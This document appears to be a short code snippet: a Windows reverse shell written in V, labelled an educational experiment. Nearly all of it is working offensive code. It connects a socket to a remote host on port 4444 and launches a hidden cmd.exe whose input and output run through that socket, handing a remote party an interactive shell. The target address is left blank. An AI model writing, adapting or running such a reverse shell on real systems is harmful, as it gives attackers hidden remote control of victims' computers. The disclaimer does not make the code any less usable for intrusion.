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Created August 16, 2022 19:39
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Simple Windows reverse shell based on V. Just an experiment. For educational purposes only!
#flag -lws2_32
#include "winsock2.h"
struct WSADATA {
w_version u16
w_high_version u16
i_max_sockets u16
i_max_udp_dg u16
lp_vendor_info &string = 0
sz_description [257]char
sz_system_status [129]char
struct SOCKADDR_IN {
sin_family u16
sin_port u16
sin_addr u32
sin_zero [8]char
struct StartupInfo {
cb u32
lp_reserved &u16
lp_desktop &u16
lp_title &u16
dw_x u32
dw_y u32
dw_x_size u32
dw_y_size u32
dw_x_count_chars u32
dw_y_count_chars u32
dw_fill_attributes u32
dw_flags u32
w_show_window u16
cb_reserved2 u16
lp_reserved2 &byte
h_std_input voidptr
h_std_output voidptr
h_std_error voidptr
struct ProcessInformation {
h_process voidptr
h_thread voidptr
dw_process_id u32
dw_thread_id u32
fn C.WSAStartup(u16, &WSADATA) int
fn C.WSACleanup() int
fn C.WSASocketA(i32, i32, i32, voidptr, u32, u32) voidptr
fn C.connect(voidptr, &SOCKADDR_IN, int) int
fn C.inet_addr(&char) u32
fn C.htons(u16) u16
fn C.WSAGetLastError() i32
fn C.closesocket(voidptr) int
fn C.CreateProcessW(lpApplicationName &u16, lpCommandLine &u16, lpProcessAttributes voidptr, lpThreadAttributes voidptr, bInheritHandles bool, dwCreationFlags u32, lpEnvironment voidptr, lpCurrentDirectory &u16, lpStartupInfo voidptr, lpProcessInformation voidptr) bool
fn C.GetLastError() u32
fn main() {
shell(c'', 4444)
fn shell(host &char, port u16) {
data := WSADATA{}
mut error := C.WSAStartup(u16(0x202), &data)
if error != 0 {
println('[-] WSAStartup return value: $error')
socket := C.WSASocketA(C.AF_INET, C.SOCK_STREAM, 0, 0, 0, 0)
if socket == C.INVALID_SOCKET {
msg := C.WSAGetLastError()
println('[-] WSASocket error: $msg')
mut addr := SOCKADDR_IN{}
addr.sin_family = 2
addr.sin_addr = C.inet_addr(host)
addr.sin_port = C.htons(port)
error = C.connect(socket, &addr, sizeof(C.SOCKADDR_IN))
if error != 0 {
println('[-] WSA connect error: $error')
mut start_info := StartupInfo{
lp_reserved2: 0
lp_reserved: 0
lp_desktop: 0
lp_title: 0
mut proc_info := ProcessInformation{}
start_info.h_std_input = socket
start_info.h_std_output = socket
start_info.h_std_error = socket
start_info.dw_flags = u32(C.STARTF_USESTDHANDLES)
create_process_ok := C.CreateProcessW(0, 'cmd.exe'.to_wide(), 0, 0, C.TRUE, C.CREATE_NO_WINDOW,
0, 0, voidptr(&start_info), voidptr(&proc_info))
if !create_process_ok {
perror := C.GetLastError()
println('[-] CreateProcessW error: $perror')
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